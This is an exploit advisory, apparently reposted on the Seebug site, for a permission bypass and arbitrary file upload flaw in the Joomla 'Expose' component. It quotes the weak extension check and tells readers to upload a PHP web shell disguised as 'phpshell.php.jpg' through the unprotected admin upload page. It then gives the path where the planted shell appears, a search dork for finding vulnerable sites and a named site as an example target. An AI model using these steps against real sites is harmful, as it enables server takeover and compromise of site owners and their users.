================================================================================================================ ++ Joomla Component Expose <= RC35 Remote Permission Bypass/Arbitrary File Upload Vulnerability ++ ++ http://joomlacode.org/gf/download/frsrelease/726/10814/com_expose_small_rc4.zip ++ ---------------------------------------------------------------------------------------------------------------- ++ in : /com_expose/uploadimg.php ++ ++ => $target_path = "../../../components/com_expose/expose/img/"; ++ ++ if((strcasecmp(substr($userfile_name,-4),'.jpg'))){ echo "<script>alert('The file must be jpg');</script>";++ ++ File Upload : <?php echo $target_path; ?> ++ ++ Attacker Got Permission Bypass and upload files ++ ---------------------------------------------------------------------------------------------------------------- ++ Arbitrary File Upload ++ ++ use this link to upload your phpshell [ phpshell.php.jpg ] ++ ++ http://site.com/administrator/components/com_expose/uploadimg.php ++ ++ You wil have shell file in this page ++ ++ http://site.com/components/com_expose/expose/img/ ++ ++ Example : http://ayazshah.com/ ++ ++ Dork : "index.php?option=com_expose" ++ ---------------------------------------------------------------------------------------------------------------- ++ Cold z3ro ++ ++ http://hackteach.org ++ ---------------------------------------------------------------------------------------------------------------- ++ Greets : Hackteach Members , Xp10.Com ++ ++ Greets 2 arab Coders : ValentinoLove,Gold M,Sniper-sa,dOCnOK,Hammam,Pal-booter Coders speciale Mr.jerusalem++ ================================================================================================================
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论